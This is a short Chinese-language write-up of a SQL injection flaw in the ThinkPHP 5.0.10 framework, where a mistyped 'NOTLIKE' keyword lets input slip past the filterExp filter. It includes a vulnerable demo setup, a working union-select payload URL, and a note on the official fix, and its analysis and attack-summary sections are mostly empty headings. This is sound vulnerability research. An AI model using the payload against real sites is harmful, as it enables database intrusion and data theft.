漏洞简介 传入的参数默认都会经过filterExp方法过滤,但是这次NOT LIKE被写成了NOTLIKE,过滤失效,在parseWhereItem中经过拼接造成了sql报错注入
环境配置 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 composer create -project "require" : { "php" : ">=5.4.0" , "topthink/framework" : "5.0.10" }, composer update 在application/index /controller/Index.php添加 <?php namespace app\index \controller; class Index { public function index() { $username = request()->get('username/a'); $result = db('users')->where(['username' => $username])->select(); var_dump($result); } } 在数据库添加 create database tpdemo;use tpdemo;create table users ( id int primary key auto_increment, username varchar (50 ) not null ); insert into users (id ,username) values (1 ,'mochazz' );在appliaction的config和database配置数据库并将app_debug和app_trace修改为true
payload 1 http://localhost/index.php/index/index?username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=) union select 1 ,user ()%23
漏洞分析 where用于指定AND查询条件,这里我们进入select方法直奔主题select方法parseWhere里面,跟进
攻击总结
官方修复 NOTLIKE改回了NOT LIKE
